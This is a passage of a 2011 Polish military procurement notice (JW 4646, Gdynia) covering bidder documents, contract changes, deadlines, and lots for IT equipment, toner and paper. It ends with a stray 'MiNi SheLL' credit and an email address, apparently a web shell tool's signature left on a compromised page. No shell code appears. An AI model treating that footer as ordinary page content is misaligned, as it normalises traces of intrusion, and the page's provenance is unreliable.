<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w  postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy, wymienieni wyżej składają jedną ofertę, przy czym:
a)	wymagane oświadczenia lub dokumenty wskazane w Rozdziale IV,   podrozdziale II pkt  2 ppkt 2.1 i 2.2 składa osobno każdy z Wykonawców;
b)	pozostałe oświadczenia lub dokumenty wskazane w Rozdziale IV, podrozdziale   II pkt 1 składa przynajmniej jeden Wykonawca, który spełnia warunki lub Wykonawcy wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy stosownie do art. 144 ust. 1 UPZP między innymi  w przypadkach:   
a)	zmiany  adresu, nazwy, statusu firmy;
b)	w przypadku zmiany osób mających nadzór nad realizacją umowy;
c)	zmiany nazw materiałów w przypadku zaprzestania produkcji, zmian wielkości opakowań bądź zmian w asortymencie producenta, z zastrzeżeniem, iż parametry oraz cena będą odpowiadać parametrom i cenom zawartym w ofercie.
d)	Zmiany miejsca dostarczania materiałów eksploatacyjnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/new.serw.net/jw4646<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4646 ul. M.C. Skłodowskiej 2, 81-209 Gdynia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 09:30, miejsce: Jednostka Wojskowa 4646, ul. M.C. Skłodowskiej 2, 81-209 Gdynia.  w kancelarii ilościowo-wartościowej służby finansowej - kancelaria nr 10 bud. Nr 3 - parter JW 4646,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> UWAGA: kancelaria ilościowo-wartościowa służby finansowej znajduje się na terenie J.W. 4646, gdzie obowiązuje system przepustek wydawanych przy wejściu, po okazaniu dowodu tożsamości. Składając ofertę należy uwzględnić czas na otrzymanie przepustki. Za moment wpłynięcia oferty uznaje się czas jej zarejestrowania w kancelarii ilościowo-wartościowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa sprzętu informatycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z formularzem cenowym załącznik 2-1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.23.13.10-3, 31.68.25.30-4, 32.55.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa wkładów drukujących i papieru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z formularzem cenowym załącznik 2-2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.19.23.00-0, 30.12.51.10-5, 30.19.93.30-1, 30.19.93.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa wkładów drukujących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z formularzem cenowym załącznik 2-3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa sprzętu informatycznego i materiałów eksploatacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z formularzem cenowym załącznik 2-4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9, 31.44.00.00-2, 30.23.72.52-0, 48.76.00.00-3, 30.23.40.00-8, 30.23.31.53-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com